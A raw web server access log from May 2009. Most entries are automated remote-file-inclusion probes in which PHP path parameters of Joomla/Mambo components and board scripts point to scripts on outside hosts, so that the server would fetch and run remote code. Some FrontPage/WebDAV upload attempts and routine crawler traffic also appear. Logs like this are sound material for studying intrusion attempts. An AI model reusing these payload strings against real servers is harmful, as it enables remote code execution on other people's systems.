222.122.26.5 - - [17/May/2009:03:28:14 -0500] "GET /logs/access_log.1239926400//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
66.249.67.180 - - [17/May/2009:03:31:55 -0500] "GET /logs/access_log.1128816000 HTTP/1.1" 200 860 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.206.26 - - [17/May/2009:03:35:29 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:03:35:29 -0500] "GET /logs/access_log.1236643200//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:03:35:29 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.15.206.26 - - [17/May/2009:03:35:50 -0500] "GET /logs/access_log.1238716800//components/com_flyspray/startdown.php?file=http://www.e-blacklist.net/alditor/bin1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
94.198.214.29 - - [17/May/2009:03:36:27 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:03:36:27 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:03:36:27 -0500] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:03:36:27 -0500] "GET //components/com_flyspray/startdown.php?file=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:03:37:33 -0500] "GET //?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:03:37:35 -0500] "GET //?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:03:37:38 -0500] "GET /logs//?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:03:37:38 -0500] "GET /logs//?_zb_path=http://208.98.22.241/id.txt??? HTTP/1.1" 200 189703 "-""libwww-perl/5.805"
218.246.20.221 - - [17/May/2009:03:40:33 -0500] "GET /logs///skin/zero_vote/setup.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
218.246.20.221 - - [17/May/2009:03:40:33 -0500] "GET /logs/access_log.1236211200///skin/zero_vote/setup.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:46:02 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:46:02 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:46:02 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:03:48:41 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:03:48:41 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:03:48:41 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:52:05 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:52:05 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:03:52:05 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:03:53:07 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:03:53:07 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:03:53:07 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
66.249.67.180 - - [17/May/2009:03:56:16 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
65.55.106.121 - - [17/May/2009:03:56:24 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.121 - - [17/May/2009:03:58:08 -0500] "GET /logs/access_log.1195430400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [17/May/2009:04:00:37 -0500] "GET /_vti_cnf/?S=D HTTP/1.1" 200 676 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.50.163.164 - - [17/May/2009:04:01:19 -0500] "GET /logs//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:04:01:19 -0500] "GET //include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:02:46 -0500] "GET /logs//include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:02:46 -0500] "GET //include/rg4_board/view.php?bbs_code=http://208.98.22.241/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
58.227.193.198 - - [17/May/2009:04:03:06 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:04:03:06 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:04:03:06 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
70.86.169.162 - - [17/May/2009:04:03:38 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:04:03:42 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
193.221.119.126 - - [17/May/2009:04:04:48 -0500] "GET /upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:04:04:48 -0500] "GET /logs/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:04:04:49 -0500] "GET /logs/access_log.1240444800/upload/admin/includes/header.inc.php?GLOBALS[rootDir]=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:05:42 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:05:42 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:05:42 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:05:47 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:06:01 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:06:01 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:06:02 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:06:19 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:06:31 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:06:31 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:06:31 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.206.183.148 - - [17/May/2009:04:06:36 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:04:07:10 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:04:07:10 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:04:07:11 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:07:12 -0500] "GET //config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.165.73.157 - - [17/May/2009:04:07:14 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:07:16 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:07:16 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
69.237.82.158 - - [17/May/2009:04:07:29 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
116.50.163.164 - - [17/May/2009:04:09:25 -0500] "GET /logs//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
116.50.163.164 - - [17/May/2009:04:09:25 -0500] "GET //modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:10:13 -0500] "GET /logs//modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
89.187.131.186 - - [17/May/2009:04:10:13 -0500] "GET //modules/rg4_board/list.php?bbs_code=admin=http://208.98.22.241/id.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
217.13.127.95 - - [17/May/2009:04:10:23 -0500] "GET //include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:23 -0500] "GET /logs//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:23 -0500] "GET /logs/access_log.1233705600//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:25 -0500] "GET /logs/access_log.1235952000//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:30 -0500] "GET //include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:30 -0500] "GET /logs/access_log.1233705600//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:30 -0500] "GET /logs//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
217.13.127.95 - - [17/May/2009:04:10:30 -0500] "GET /logs/access_log.1235952000//include/rg4_board/list.php?bbs_code=admin=http://rgcq.org/Quickstart/baner.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.208.139 - - [17/May/2009:04:14:24 -0500] "GET /logs/access_log.1227916800 HTTP/1.1" 200 14430 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.139 - - [17/May/2009:04:15:56 -0500] "GET /logs/access_log.1239408000 HTTP/1.1" 200 382907 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.150.79.146 - - [17/May/2009:04:18:52 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:18:52 -0500] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:18:52 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:21:05 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:21:05 -0500] "GET /logs/access_log.1230076800//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:21:05 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:22:07 -0500] "GET /logs/access_log.1233100800//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
218.150.79.146 - - [17/May/2009:04:23:29 -0500] "GET /logs/access_log.1233100800//modules/vwar/admin/admin.php?vwar_root=http://assishop.com/php/data/photo/fx1?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.3.226.56 - - [17/May/2009:04:26:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
72.3.226.56 - - [17/May/2009:04:26:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.79"
82.159.191.105 - - [17/May/2009:04:35:12 -0500] "GET /logs/access_log.1239926400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
82.159.191.105 - - [17/May/2009:04:35:12 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
82.159.191.105 - - [17/May/2009:04:35:14 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
218.146.231.207 - - [17/May/2009:04:39:55 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
218.146.231.207 - - [17/May/2009:04:39:55 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.146.231.207 - - [17/May/2009:04:41:57 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.117.188.207 - - [17/May/2009:04:42:02 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.117.188.207 - - [17/May/2009:04:42:13 -0500] "GET /logs/access_log.1236988800 HTTP/1.1" 200 251443 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
124.217.216.86 - - [17/May/2009:04:42:24 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:04:42:24 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.217.216.86 - - [17/May/2009:04:42:24 -0500] "GET /logs/access_log.1239926400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
212.117.188.207 - - [17/May/2009:04:42:32 -0500] "GET /logs/access_log.1240617600 HTTP/1.1" 200 229376 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
65.55.106.143 - - [17/May/2009:04:44:38 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.143 - - [17/May/2009:04:45:33 -0500] "GET /logs/access_log.1167004800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [17/May/2009:04:47:05 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.143 - - [17/May/2009:04:47:05 -0500] "GET /logs/access_log.1177459200 HTTP/1.1" 200 1248 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
195.5.168.93 - - [17/May/2009:04:48:04 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:04:48:04 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:04:48:04 -0500] "GET /logs/access_log.1239926400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:04:48:28 -0500] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:04:48:28 -0500] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.5.168.93 - - [17/May/2009:04:48:28 -0500] "GET /logs/access_log.1239926400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 378 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:01 -0500] "GET /logs/access_log.1239667200/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:01 -0500] "GET /logs/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:01 -0500] "GET /main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:30 -0500] "GET /main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:30 -0500] "GET /logs/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
123.143.98.5 - - [17/May/2009:04:49:31 -0500] "GET /logs/access_log.1239667200/main.php?appserv_root=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:04:53:00 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:04:53:00 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
88.191.103.144 - - [17/May/2009:04:53:00 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:04:53:28 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:04:53:28 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
193.221.119.126 - - [17/May/2009:04:53:29 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
189.8.13.18 - - [17/May/2009:04:54:57 -0500] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.0" 404 299 "-""MSFrontPage/4.0"
189.8.13.18 - - [17/May/2009:04:54:58 -0500] "PUT /ferror.txt HTTP/1.0" 405 304 "-""Microsoft Data Access Internet Publishing Provider DAV 1.1"
189.8.13.18 - - [17/May/2009:04:54:58 -0500] "GET /ferror.txt HTTP/1.0" 404 281 "-""Lynx/2.8.6rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8e"
58.227.193.198 - - [17/May/2009:04:58:14 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 329 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:04:58:14 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
58.227.193.198 - - [17/May/2009:04:58:14 -0500] "GET /logs/access_log.1239926400/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 351 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:05:00:36 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 356 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:05:00:41 -0500] "GET /logs/access_log.1239926400/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 383 "-""Mozilla/5.0"
122.153.212.195 - - [17/May/2009:05:00:44 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 361 "-""Mozilla/5.0"
212.116.143.146 - - [17/May/2009:05:04:28 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scv.co.kr/zboard/info.txt????? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
212.116.143.146 - - [17/May/2009:05:04:28 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.scv.co.kr/zboard/info.txt????? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
